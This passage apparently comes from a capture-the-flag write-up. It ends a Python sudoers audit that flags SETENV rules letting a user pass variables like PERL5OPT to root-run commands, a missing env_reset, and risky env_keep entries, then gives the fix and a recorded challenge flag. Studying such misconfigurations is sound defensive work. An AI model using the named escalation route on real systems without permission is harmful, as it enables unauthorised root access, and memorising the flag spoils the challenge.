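                "SETENV lets %s pass arbitrary environment variables (e.g. PERL5OPT) to %s run as %s"
                % (m.group("user"), cmd, m.group("runas"))))
    if not env_reset:
        findings.append((0, "Defaults env_reset is not set; the caller's environment reaches every command"))
    risky = sorted(kept & INTERPRETER_ENV)
    if risky:
        findings.append((0, "env_keep preserves interpreter-controlling variables: %s" % ", ".join(risky)))
    return findings


if __name__ == "__main__":
    for lineno, message in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d: %s" % (lineno, message))
```

On the sample the only finding is the SETENV rule; the fix is to drop the SETENV tag (and, for a root-run script that calls Perl, to have the script export a clean environment itself rather than trust what sudo passed in). The audit is a text check only: sudo's real parser also honours aliases, include directives and per-command Defaults, so treat a clean result as necessary, not sufficient.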

Second flag obtained: 635e217dd41a18dae7f1843b7d5509c6